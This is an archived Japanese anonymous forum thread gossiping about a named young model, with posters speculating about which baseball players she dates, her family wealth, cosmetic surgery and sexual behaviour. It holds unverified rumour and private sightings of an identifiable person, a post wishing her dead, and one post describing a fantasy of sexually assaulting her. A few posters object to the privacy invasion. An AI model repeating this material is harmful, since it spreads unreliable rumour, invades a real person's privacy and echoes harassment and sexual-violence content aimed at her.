191 :無名モデル:2006/12/24(日) 14:55:51 ID:???
今日はX'mas

192 :無名モデル:2006/12/24(日) 15:11:13 ID:HScJcXoI
でかくてガタイいいから男の方に先に目がいって
じゃあ横に藤原さんがいたんだよ。あの顔すぐ分かるね。
かわいかったよ。関西弁でイルミネーションいいねxとかそんな事言ってた
男はウンウンって感じで優しそうだった 

193 :無名モデル:2006/12/24(日) 16:35:19 ID:???
人のプライベートを事細かにこんな所に書くべきじゃないよ、自分がされたら嫌でしょ

194 :無名モデル:2006/12/24(日) 17:28:05 ID:???
同じ高校だったけ東京行って青学行って六本木ヒルズ住んで読者モデルになってミス着物になって彼氏野球選手かぁ………
すっかり違う世界の人になったな。ここまできたら頑張ってほしいし応援する

195 :無名モデル:2006/12/24(日) 19:41:59 ID:???
麗子は麗子のままだよ、周りが騒いだりひがんだりしてるだけ
もうすぐ成人式あるけど着物の女王が行くわけね
どんなだろう?

196 :無名モデル:2006/12/25(月) 00:17:52 ID:???
彼氏野球選手ではない

197 :無名モデル:2006/12/25(月) 02:35:37 ID:???
いや野球選手ですから

198 :無名モデル:2006/12/25(月) 02:57:07 ID:kTN+CRz6
野間口?

199 :無名モデル:2006/12/25(月) 03:02:09 ID:???
そう

200 :無名モデル:2006/12/25(月) 03:24:43 ID:???
違うし

201 :無名モデル:2006/12/25(月) 03:27:56 ID:???
恋カラでてただけで帝塚の中でかなり騒いでたよ
けどその後FLUSHで特集されてたよね

202 :無名モデル:2006/12/25(月) 03:33:10 ID:???
じゃあ誰だよ
知ってんなら言ってみろ

203 :ヒント:2006/12/25(月) 03:36:33 ID:???
ヒント:彼氏さんは在京球団の選手だよ
藤原さんと本当に仲いい人なら知ってるよ
野球見てる人なら絶対知ってる人
これ以上はばれるから言えないからごめん

204 :無名モデル:2006/12/25(月) 03:53:52 ID:???
在京ってどういう意味だ?頭悪くてすまん

205 :無名モデル:2006/12/25(月) 03:56:27 ID:???
関東地方の中ってこと

206 :無名モデル:2006/12/25(月) 06:09:13 ID:???
じゃあダルは違う…やっぱり野間口?それとも青木?

207 :無名モデル:2006/12/25(月) 09:04:10 ID:8fUi+79c
綺麗だけどお嬢様らしい品はないね

208 :無名モデル:2006/12/25(月) 09:12:35 ID:???
確かに、なんかあまり結婚したいとは思わねえな。何もできなそうだし。

209 :無名モデル:2006/12/25(月) 09:30:23 ID:???
おまえの稼ぎじゃ無理だ

210 :無名モデル:2006/12/25(月) 09:32:46 ID:???
噂の選手たちも麗子と本気で結婚とかは考えてなさそう。
あくまで遊び相手。
結婚はやっぱアナとかのがいいでしょ。


211 :無名モデル:2006/12/25(月) 09:48:07 ID:???
そりゃそうだよ。野球選手たちはルックスも大切ではあるだろうけど、それより料理や掃除など、自分の留守もしっかり守ってくれる人を選ぶだろう。そうじゃないと自分が破滅するから。

212 :無名モデル:2006/12/25(月) 09:53:46 ID:M+95b+Dp
いやいや金持ちのお嬢さんだし自分が引退後も安心じゃん。美人だし学歴あるしちょっと華やかな世界かじってるし女子アナの卵みたいだと思うよ。料理もできるらしいし。ただ両方が金が無くなると何も彼女はできなさそう。働けなさそうだし浪費しそう。

213 :無名モデル:2006/12/25(月) 09:57:49 ID:???
選手が稼げなくなったら何のためらいもなく離婚しそう

214 :無名モデル:2006/12/25(月) 10:01:54 ID:???
まず怪我したら終わりのスポーツ選手とは麗子の方が結婚はないと思う。あの落合にのパパと貫禄ママが許さないだろね。だからヒルズ族とか外資の人とかとも遊んでるし。選手は逆玉狙いもありそう

215 :無名モデル:2006/12/25(月) 10:02:11 ID:???
うん、だから野球選手とかサッカー選手との結婚はないと思う。官僚とかヒルズ族とか…そっちだろな。

216 :無名モデル:2006/12/25(月) 10:37:52 ID:???
彼女は将来一体何になるつもりなの?

217 :無名モデル:2006/12/25(月) 10:42:21 ID:???
続・セレブ

218 :無名モデル:2006/12/25(月) 17:49:57 ID:???
およめちゃんになるの

219 :無名モデル:2006/12/25(月) 18:09:16 ID:???
やっぱりヤクルト青木メジャー行くんだ、年棒14000万円蹴るんだ。藤原知ってたはずだよ、さすが秘密主義者口が堅いね。なんか約束してたりして?

220 :無名モデル:2006/12/25(月) 19:16:32 ID:???
うわそれ百パーセント知ってたよ、性格わる(-.-;)

221 :無名モデル:2006/12/25(月) 21:07:49 ID:???
は?別に性格悪くないだろ。ペラペラ喋りまくるほうが嫌な奴だろ

222 :無名モデル:2006/12/25(月) 23:08:11 ID:???
もしかして青木と一緒に行くならN,Y,?コミュでパパとN.Y.よく行くって書いてた。 メッツが欲しがるタイプ

223 :無名モデル:2006/12/25(月) 23:17:31 ID:???
帝塚の子ここ見てたら今度の同窓会何色の振袖着ていく?私は黒赤に金刺繍やけど。

224 :無名モデル:2006/12/26(火) 08:50:18 ID:h0967jHT
ここ見てると藤原麗子は
ただ単に下半身だらしないだけに思えるんだけど・・・
それとも誰にもヤラせないでこんなモテモテなの?

225 :無名モデル:2006/12/26(火) 09:29:52 ID:???
誰にもやらせないでこれだけサッカー選手→野球選手・ヒルズ族からチヤホヤされてるとしたら凄い。

226 :無名モデル:2006/12/26(火) 10:54:43 ID:???
ダルとは付き合ってないのか?

227 :無名モデル:2006/12/26(火) 11:14:44 ID:???
ダルとは関西ワルがき仲間恋愛相談したりしてる
深夜ヒルズ呼び出して男の本音聞いているって

228 :無名モデル:2006/12/26(火) 11:30:29 ID:???
モテてはいるけど全員深入りしてないよ。知り合いは超多いけれど仲良くなる人は決まっててリピートして遊んでいる。それをみんなが大きく想像してガセネタもいれるから。あとヤラせらないでプレゼント貰う天才。鉄のパンツ女

229 :無名モデル:2006/12/26(火) 11:36:45 ID:???
コイツの売りが見た目派手だけど青学だしお嬢だし真面目ですっ!!!ていうギャップ。

230 :無名モデル:2006/12/26(火) 11:42:43 ID:???
とりあえずこいつらのグループ大嫌い。死ねばいいのに。今だけだよ。劣化したら捨てられるから田舎の関西に帰れ。

231 :無名モデル:2006/12/26(火) 12:25:48 ID:???
8日の成人式、ダル大阪の羽曳野っていう地元で出席するらしい。      藤原口堅いけど学校に連れていくつもりじゃないかな

232 :無名モデル:2006/12/26(火) 14:13:24 ID:???
イメージ良くない

233 :無名モデル:2006/12/26(火) 15:09:19 ID:???
酒飲めないって言ってたけどドンペリとオーパスワンとロマネは飲んでたW

234 :無名モデル:2006/12/26(火) 20:20:32 ID:???
ダルを学校に連れてくのか?こいつバカか?

235 :無名モデル:2006/12/26(火) 20:30:30 ID:???
みんな妄想するなゃワラ

236 :無名モデル:2006/12/26(火) 20:35:29 ID:???
なんかダルと繋がってること自体が怪しい
どーせ妄想じゃねーのかよって感じ

237 :無名モデル:2006/12/26(火) 20:48:37 ID:???
つーか妄想するしかないじゃん。藤原さんは何も言わないし。言ってる事を信じると何年彼氏いないんだよって思う

238 :無名モデル:2006/12/26(火) 21:12:52 ID:???
ぶすのみかあらしのみか

239 :無名モデル:2006/12/26(火) 22:01:52 ID:???
ケバい

240 :無名モデル:2006/12/26(火) 22:05:21 ID:???
整形じゃん まあ金もあるんだししないわけないか 羨ましいよ それすらできない私にしたら藤原さんが本当に羨ましい

241 :無名モデル:2006/12/26(火) 22:08:47 ID:???
整形でもあんだけ美人ならいい。私整形したけどあんまり可愛くならなかったし。女子アナとかも整形だもんね

242 :無名モデル:2006/12/26(火) 22:21:04 ID:1ju8BaGv
身長高い目撃団の男って斉藤じゃないの?ダルは高すぎで目立つけど斉藤も190だよ

243 :無名モデル:2006/12/26(火) 22:33:45 ID:???
たしかに斉藤かもね
斉藤なら納得。見た目恐そうだし、アイカの彼氏だからそりゃ一緒にいる事もあるだろうし

244 :無名モデル:2006/12/26(火) 22:47:14 ID:???
だよな、なんかダルって言われてもぱっとしないよな。ダルはギャル好きらしいしな。藤原とは繋がってないんじゃね?

245 :無名モデル:2006/12/26(火) 23:03:49 ID:???
斉藤ってソフバンの和巳?

246 :無名モデル:2006/12/26(火) 23:05:52 ID:???
そうだよ。

247 :無名モデル:2006/12/27(水) 01:02:14 ID:/COTOY69
どして他人のことでこんな盛り上がれるの?

248 :無名モデル:2006/12/27(水) 01:18:44 ID:lwsdqSlu
藤原麗子すごい美人 笑ったときにクシャってなるのもカワイイ

249 :無名モデル:2006/12/27(水) 01:21:37 ID:???
>>98 見た男ってこんな顔だった?
www.sanspo.com/.../2006/hawks/image/66.jpg

250 :無名モデル:2006/12/27(水) 01:24:09 ID:???
ネット上のプライバシー侵害や名誉棄損について総務省と業界団体は、情報を書き込んだ発信者の同意がなくても被害者に発信者の氏名や住所などを開示する方針を固めた。
原案によると、他人の氏名や住所、電話番号など個人を特定する情報を掲示板などに勝手に書き込む行為を幅広く「プライバシー侵害」と認定。




251 :無名モデル:2006/12/27(水) 01:25:39 ID:???
--------------------------------------------------------------------------------
39:無名さん
最近サッカーの飲み会に顔出さないね藤原さん。どしたの?きまづいことでもありました?
12/26 12:12


252 :無名モデル:2006/12/27(水) 02:40:11 ID:???
麗子タンはぁはぁ(´Д`)
色白美肌美人最高…
犯したい……綺麗な白い肌をベチョベチョに舐め回して可愛い顔も舐め回して唾液無理やり飲ませて
泣きじゃくる麗子タンを押さえ付けて犯したい…

253 :無名モデル:2006/12/27(水) 02:45:43 ID:???
着物の画像見ると品がある美人に見える

254 :無名モデル:2006/12/27(水) 06:08:22 ID:???
ケバケバだろ。

255 :無名モデル:2006/12/27(水) 10:51:10 ID:???
芦屋のお嬢様だからプレゼント欲しがらないし頭いいから口が堅い
野球選手にとっては最高だからもてるんだね

256 :無名モデル:2006/12/27(水) 11:41:19 ID:???
青木とお似合いだ★

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)